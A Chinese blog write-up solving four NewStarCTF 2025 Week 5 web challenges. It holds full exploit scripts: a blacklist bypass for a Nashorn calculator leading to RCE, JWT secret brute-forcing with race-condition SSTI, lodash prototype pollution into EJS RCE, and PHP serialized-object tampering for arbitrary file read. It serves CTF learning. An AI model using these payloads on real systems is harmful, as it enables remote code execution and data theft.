NewStarCTF2025-Week5-Web

最新推荐文章于 2025-12-16 10:44:31 发布
原创 最新推荐文章于 2025-12-16 10:44:31 发布 · 998 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #java #web #安全 #CTF #web安全 #php

目录

1、眼熟的计算器

2、废弃的网站

3、小W和小K的故事(最终章)

4、Binary Blog

1、眼熟的计算器

反编译jar包看源码

做了黑名单,需要绕过,然后执行命令

Exp:

import requests
import urllib.parse
import re

host = "http://8.147.132.32:38529"
url = f"{host}/calc"

# 绕过黑名单: "java.lang.Runtime", "new"
# 使用字符串拼接 + 反射获取 Scanner 构造器 + newInstance 调用
exploit_js = r'''
var rtName = 'java.lang.Run' + 'time';
var Runtime = Java.type(rtName);
var runtime = Runtime.getRuntime();
var p = runtime.exec('cat /flag');
var is = p.getInputStream();
var Scanner = Java.type('java.util.Scanner');
var InputStream = Java.type('java.io.InputStream');
var StringClass = Java.type('java.lang.String');
var constr = Scanner.class.getConstructor(InputStream.class, StringClass.class);
var n = 'n'; var e = 'e'; var w = 'w';
var methodName = n + e + w + 'Instance';
var scanner = constr[methodName](is, 'UTF-8');
scanner.useDelimiter('\\A');
var result = scanner.hasNext() ? scanner.next() : '';
if (result === '') {
  var es = p.getErrorStream();
  var constr_es = Scanner.class.getConstructor(InputStream.class, StringClass.class);
  var scanner_es = constr_es[methodName](es, 'UTF-8');
  scanner_es.useDelimiter('\\A');
  result = scanner_es.hasNext() ? scanner_es.next() : '';
}
scanner.close();
result;
'''

def send_request(content):
    encoded = urllib.parse.quote(content)
    target = url + "?content=" + encoded
    try:
        r = requests.get(target, timeout=30)
        return r.text
    except Exception as e:
        print("Request error:", e)
        return None

def main():
    print("Sending exploit payload...")
    text = send_request(exploit_js)
    if text:
        # 提取 flag
        match = re.search(r'flag\{[^}]*\}', text)
        if match:
            print("Flag found:", match.group(0))
        else:
            print("Flag not found in output. Raw response:")
            print(text)
    else:
        print("Request failed.")

if __name__ == "__main__":
    main()

2、废弃的网站

给了源码,结合提示,条件竞争打ssti

Exp:

import requests
import re
import time
import jwt
import hashlib
import concurrent.futures

base_url = "http://8.147.132.32:13440"

# Step 1: Get running time and guest JWT
r = requests.get(base_url + '/', cookies={'session': 'invalid'})
text = r.text
match = re.search(r'System has been running (\d+) seconds.', text)
if not match:
    print("Failed to get running time.")
    exit(1)
running = int(match.group(1))

guest_jwt = r.cookies.get('session')
if not guest_jwt:
    print("Failed to get guest JWT.")
    exit(1)

# Step 2: Brute force start time (wider range)
current = int(time.time())
correct_secret = None
for offset in range(-60, 61):
    candidate = current - running + offset
    secret = hashlib.sha256(str(candidate).encode()).hexdigest()
    try:
        decoded = jwt.decode(guest_jwt, secret, algorithms=['HS256'])
        if decoded.get('role') == 'guest' and decoded.get('name') == 'Guest User':
            correct_secret = secret
            print(f"Secret found: start_time = {candidate}")
            break
    except:
        pass

if not correct_secret:
    print("Failed to find correct secret. Current time:", current, "Running:", running)
    exit(1)

# Step 3: Universal SSTI RCE payload (no hardcoded index)
ssti = r'''
{{ lipsum.__globals__["os"].popen("cat /flag").read() }}
'''

# Step 4: Forge JWTs
admin_jwt = jwt.encode({
    "id": 1, "role": "admin", "name": "Administrator"
}, correct_secret, algorithm='HS256')

exploit_jwt = jwt.encode({
    "id": 2, "role": "guest", "name": ssti
}, correct_secret, algorithm='HS256')


# Step 5: Race condition functions
def send_admin():
    return requests.get(base_url + '/admin', cookies={'session': admin_jwt}, timeout=15).text


def send_exploit():
    return requests.get(base_url + '/', cookies={'session': exploit_jwt}, timeout=15).text


# Step 6: Exploit with retry
def attempt():
    with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
        admin_future = executor.submit(send_admin)
        time.sleep(0.07)  # Critical: let admin request enter admin_required
        exploit_future = executor.submit(send_exploit)

        admin_text = admin_future.result()
        exploit_text = exploit_future.result()

    match = re.search(r'flag\{[^}]*\}', admin_text)
    if match:
        print("FLAG:", match.group(0))
        return True
    return False


# Step 7: Run multiple attempts
for i in range(50):
    print(f"Attempt {i + 1}/50...")
    if attempt():
        break
    time.sleep(0.3)
else:
    print("Failed after 50 attempts. Try again.")

3、小W和小K的故事(最终章)

    考察原型链污染,题目使用固定种子预测 Admin 密码后登录;

    通过 /addUser 路由中的 lodash.defaultsDeep(users, req.body)向全局 Object.prototype 注入 client=true 和恶意 escapeFunction;

    最终,当访问 / 路由触发 res.render('index', ...) 渲染 EJS 模板时,EJS 会误将全局原型链上的恶意属性视为有效渲染选项并执行 escapeFunction,从而实现 RCE 获取 Flag。

    Exp:

    import requests
import json
import re
import sys

# --- Configuration ---
TARGET_URL = "https://eci-2ze0q0ggj5u9py52mu38.cloudeci1.ichunqiu.com:3000"
ADMIN_USERNAME = 'admin'
PRNG_SEED = 114514

requests.packages.urllib3.disable_warnings()


# --- PRNG Calculation ---
class PRNG:
    MODULUS = 998244353
    MULTIPLIER = 48271
    CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"

    def __init__(self, seed):
        self.seed = seed % self.MODULUS

    def next_int(self):
        self.seed = (self.seed * self.MULTIPLIER) % self.MODULUS
        return self.seed

    def get_random_int(self, min_val, max_val):
        return min_val + (self.next_int() % (max_val - min_val))

    def get_random_string(self, length):
        result = ""
        for _ in range(length):
            random_index = self.get_random_int(0, len(self.CHARSET))
            result += self.CHARSET[random_index]
        return result


def calculate_admin_password(seed):
    rng = PRNG(seed)
    rng.get_random_string(16)  # Session Secret (State change)
    return rng.get_random_string(16)  # Admin Password


# --- Main Exploit Function ---
def exploit_rce():
    session = requests.Session()

    # 1. Calculate password and login
    admin_password = calculate_admin_password(PRNG_SEED)
    print(f"🔑 Admin Password: {admin_password}")

    login_url = f"{TARGET_URL}/login"
    login_payload = {"username": ADMIN_USERNAME, "password": admin_password}

    try:
        session.post(login_url, json=login_payload, allow_redirects=False, verify=False)
    except requests.exceptions.RequestException as e:
        print(f"❌ Login error: {e}");
        sys.exit(1)

    if 'session' not in session.cookies:
        print("❌ Login failed. Exiting.");
        sys.exit(1)

    print("✅ Logged in.")

    # 2. Prototype Pollution Payload
    rce_payload_value = f"1; return global.process.mainModule.constructor._load('child_process').execSync('cat /flag').toString(); //"

    pollution_payload = {
        "constructor": {
            "prototype": {
                "client": True,
                "escapeFunction": rce_payload_value
            }
        }
    }

    # 3. Trigger Pollution via /addUser (lodash.defaultsDeep)
    add_user_url = f"{TARGET_URL}/addUser"
    try:
        session.post(add_user_url, json=pollution_payload, allow_redirects=False, verify=False)
        print("✅ Pollution payload sent.")
    except requests.exceptions.RequestException as e:
        print(f"❌ Pollution request error: {e}");
        sys.exit(1)

    # 4. Trigger EJS RCE (GET /)
    trigger_url = f"{TARGET_URL}/"
    print("🔥 Triggering RCE...")

    try:
        response = session.get(trigger_url, verify=False)
        flag_match = re.search(r'ichiq\{[a-zA-Z0-9_-]+\}', response.text)

        if flag_match:
            print("\n🎉 **Flag Found!** 🎉")
            print("====================================")
            print(f"FLAG: **{flag_match.group(0)}**")
            print("====================================")
        else:
            print("\n🤔 Flag not matched. Check response snippet:")
            print(response.text[:500])

    except requests.exceptions.RequestException as e:
        print(f"❌ RCE trigger error: {e}")


if __name__ == "__main__":
    exploit_rce()

    4、Binary Blog

    尝试登录admin未成功,随便注册一个账号进去看看

    测了下功能点,发现存在文件上传点

    随便传了个东西,注意到报错反序列化失败

    因为不清楚它反序列化的情况,我们直接发布博客导出看看dat文件的内容

    注意到其中template默认是default.php,尝试换成其他文件,比如/etc/passwd

    发现存在任意文件读取漏洞

    Payload:

    a:4:{s:9:"timestamp";i:1762009646;s:7:"version";s:3:"1.0";s:4:"blog";O:4:"Blog":8:{s:2:"id";i:5;s:5:"title";s:1:"1";s:7:"content";s:1:"1";s:7:"user_id";i:3;s:8:"username";s:3:"123";s:10:"created_at";s:19:"2025-11-01 23:07:20";s:10:"updated_at";s:19:"2025-11-01 23:07:20";s:8:"template";s:11:"/etc/passwd";}s:9:"signature";s:64:"72ced227a7068d0c078eb405a13fca4b442e19b133d5e3e27981b928d1f86dce";}

    尝试使用伪协议读取flag.php

    Payload:

    a:4:{s:9:"timestamp";i:1762009646;s:7:"version";s:3:"1.0";s:4:"blog";O:4:"Blog":8:{s:2:"id";i:5;s:5:"title";s:1:"1";s:7:"content";s:1:"1";s:7:"user_id";i:3;s:8:"username";s:3:"123";s:10:"created_at";s:19:"2025-11-01 23:07:20";s:10:"updated_at";s:19:"2025-11-01 23:07:20";s:8:"template";s:55:"php://filter/convert.iconv.SJIS.UCS-4/resource=flag.php";}s:9:"signature";s:64:"72ced227a7068d0c078eb405a13fca4b442e19b133d5e3e27981b928d1f86dce";}

    newstarctf2025week5wp
    2301_80167625的博客
    11-05 1004
    newstarctf2025 week5 misc+crypto 详细wp
    [NewStar 2024] week5完结
    weixin_52640415的博客
    11-06 819
    每次都需要用手机验证码登录,题作的差不多就没再进过。今天把week5解出的部分记录下。好像时间过去很久了。
    NewStarCTF2025-Week1-Web
    Welcome To Myon'Blog !
    10-16 1310
    这是一篇关于CTF解题过程的简短摘要: 文章记录了六道CTF题目的解题思路: robots.txt泄露hidden.php,flag在响应头 SQL注入使用万能密码1'or1#登录 通过开发工具发现s3kret.php,用十六进制绕过intval 修改游戏变量score=1000000和currentLevel=1 使用JS解除限制,计算表达式45*45 修改请求参数和请求方法,测试特殊UA头组合 解题过程涉及web安全分析等多种技术,展示了CTF竞赛的典型解题思路。
    NewStarCTF2025-Week3-Web
    Welcome To Myon'Blog !
    10-26 640
    本文总结了多个CTF题目的解题思路:1.通过file协议直接读取flag.php;2.使用URL编码和rot13绕过过滤读取flag;3.利用备份文件泄露信息找到flag;4.通过配置文件将.webp解析为PHP执行命令;5.布尔盲注技巧获取flag,需绕过空格过滤;6.SSTI漏洞利用Jinja2模板注入执行函数。每个题目都展示了不同的Web安全漏洞利用方式,涉及文件读取、编码绕过、信息泄露、命令执行、SQL注入和模板注入等技术。
    NewStarCTF2025-Week4-Web
    Welcome To Myon'Blog !
    11-02 771
    本文总结了5CTF题解:1.PHP反序列化利用POP链构造攻击,通过类方法绕过保护变量访问;2.后台弱口令和文件上传漏洞利用;3.Flask SSTI注入通过SSRF读取环境变量获取flag;4.XSS漏洞利用双写绕过过滤实现cookie窃取;5.SQL注入通过文件写入获取webshell,利用程序权限读取flag。每个题目都展示了从漏洞发现到利用的完整过程,涉及反序列化、文件上传、SSRF、SSTI、XSS和SQL注入等多种Web安全技术。
    NewStarCTF2025-Week2-Web
    Welcome To Myon'Blog !
    10-16 724
    本文摘要: 使用Python实现加密处理,通过Atbash和ROT13对PHP代码进行多层加密后生成Base64密文; 通过抓包分析动态session机制,编写自动化脚本处理数学验证挑战,快速计算表达式并提交token; 发现文件包含漏洞可直接调用MP3文件,绕过前端限制; 在SQLite注入测试中,使用%09替代空格,通过多表JOIN构造联合查询成功获取sys_config表中的配置数据。 (摘要字数:149字)
    NewStarCTF2024-Week3-Web-WP
    Welcome To Myon'Blog !
    10-23 1590
    使用 data 协议,结合 base64 编码绕过。这道题当时写的 exp 能打通 week3 和 week4 的,所以下周再给大家放出来。审代码的时候发现这句,说明应该是还有一个叫 flag.py 的文件
    NewStarCTF2024-Week4-Web-WP
    Welcome To Myon'Blog !
    10-30 2367
    打算去改上周的脚本,结果去跑的时候忘了将上次的最后 payload 注释,直接就上周的脚本就跑出来 flag 了,week3 应该是打算考布尔盲注,week4 是时间盲注,所以直接就都打通了。最后 final.php 是一个反序列化的利用,一开始还想绕过过滤的 chocolate,后面发现不需要绕过,并且 url 编码后传入不行,直接传序列化后的内容。又看到另一个下载插件路径可控的,但是插件管理里面并没有看到可以下载插件的地方, 手动构造一下,但是似乎出不了网...
    NewStarCTF2024-Week5-Web&Misc-WP
    Welcome To Myon'Blog !
    11-06 1943
    通过把 time 赋值为 happy 对象,将对象当做字符串就会触发 __tostring 魔术方法,转而继续执行 get_flag 函数,进入一个循环。但是文件传上去了怎么执行呢,文件是不会自己执行的,而且是 python 写的网站,我们 php 传上去也根本解析不了。这一步也是折腾了很久,一开始试了 /bin/ls,/usr/bin/ls,发现都会让环境崩掉。这里有个注释符,一开始想的是闭合再插入新的 php 语句,试了下没成功,采用换行符绕过。
    NewStarCTF 2023---Web week2
    WMY0323的博客
    01-09 729
    本题是一个反序列化题目,从题目中可以分析出,题目中定义了一个类evil,一个成员属性为private私有的cmd,过滤了cat、tac、more、tail、base并且大小写都进行了过滤。使用post方式进行传参,参数为unser。
    2024-NewStarCTF-WEEK2
    2301_80185313的博客
    10-16 1682
    2024-NewStarCTF-WEEK2
    2024-NewStarCTF-WEEK1
    2301_80185313的博客
    10-10 2100
    2024-NewStarCTF-WEEK1 wp
    [wp]NewStarCTF 2023 WEEK3|WEB
    m0_63138919的博客
    10-21 4858
    本文为NewStarCTF 2023 WEEK3|WEB部分题解内容 只记录自己学习的过程,各位师傅可参考指出问题
    [wp]NewStarCTF 2023 WEEK4|WEB
    m0_63138919的博客
    10-23 1439
    本文为[wp]NewStarCTF 2023 WEEK4|WEB 的解题思路
    javascript 性能优化实战:异步和延迟加载
    小伙伴们全都Lucky!
    12-11 984
    本文探讨JavaScript性能优化中的异步加载与延迟加载技术。异步加载通过async/defer属性或动态创建script元素避免阻塞渲染;延迟加载则利用IntersectionObserver API按需加载非关键资源。二者结合可显著提升性能:异步加载核心脚本确保交互流畅,延迟加载减少初始请求量。实践表明,该方案能降低DOMContentLoaded时间30%以上,减少初始加载量90%,但需注意async脚本的执行顺序问题和延迟加载的回退处理。文中提供了完整的代码实现示例。
    df赋值和.copy的区别(SettingWithCopyWarning)
    ranchor666的博客
    12-10 774
    copy()
    [Python实战] 解决Outlook同步中的字符编码问题:表情符号也能正确处理了!
    最新发布
    每日出拳老爷子的博客
    12-16 158
    摘要:本文分享了在使用Python同步Outlook会议信息时遇到的GBK编码问题解决方案。当处理包含表情符号(如📧)的会议内容时,Flask返回JSON会报"'gbk' codec can't encode"错误。作者通过封装ensure_utf8函数对文本进行UTF-8编码处理,同时建议设置Flask响应头编码为UTF-8和调整控制台输出编码,有效解决了特殊字符导致的编码异常问题。文章提供了从问题分析到完整解决方案的实践过程,适用于处理Python中的Unicode编码问题。
    Python 语言编码规范
    托塔天王的博客
    12-11 999
    通常, 不应该描述”怎么做”, 除非是一些复杂的算法,文档字符串应该提供足够的信息, 当别人编写代码调用该函数时,他不需要看一行代码,只要看文档字符串就可以了,对于复杂的代码,在代码旁边加注释会比使用文档字符串更有意义。但是,不要使用一个以上的空格,并且在二元运算符的两边使用相同数量的空格。当捕获异常时, 使用as而不要用逗号。3、 关于函数的几个方面应该在特定的小节中进行描述记录, 这几个方面如下文所述,每节应该以一个标题行开始,标题行以冒号结尾,除标题行外, 节的其他内容应被缩进2个空格。
    BaseCTF-Web-Week4-WP
    03-21
    好的,我需要处理用户关于BaseCTF Web Week4解题思路的请求。首先,用户提到了BaseCTF高校联合新生赛Week1和一篇关于UPX脱壳的博客,但实际需要的是Week4的Web题解。这可能存在混淆,我需要先确认是否存在Week4的...
    评论
    成就一亿技术人!
    拼手气红包6.0元
    还能输入1000个字符
     
    红包 添加红包
    表情包 插入表情
    表情包 代码片
     条评论被折叠 查看
    添加红包

    请填写红包祝福语或标题

    红包个数最小为10个

    红包金额最低5元

    当前余额3.43前往充值 >
    需支付:10.00
    成就一亿技术人!
    领取后你会自动成为博主和红包主的粉丝 规则
    hope_wisdom
    发出的红包

    打赏作者

    My6n

    你的鼓励将是我创作的最大动力

    ¥1 ¥2 ¥4 ¥6 ¥10 ¥20
    扫码支付:¥1
    获取中
    扫码支付

    您的余额不足,请更换扫码支付或充值

    打赏作者

    实付
    使用余额支付
    点击重新获取
    扫码支付
    钱包余额 0

    抵扣说明:

    1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
    2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

    余额充值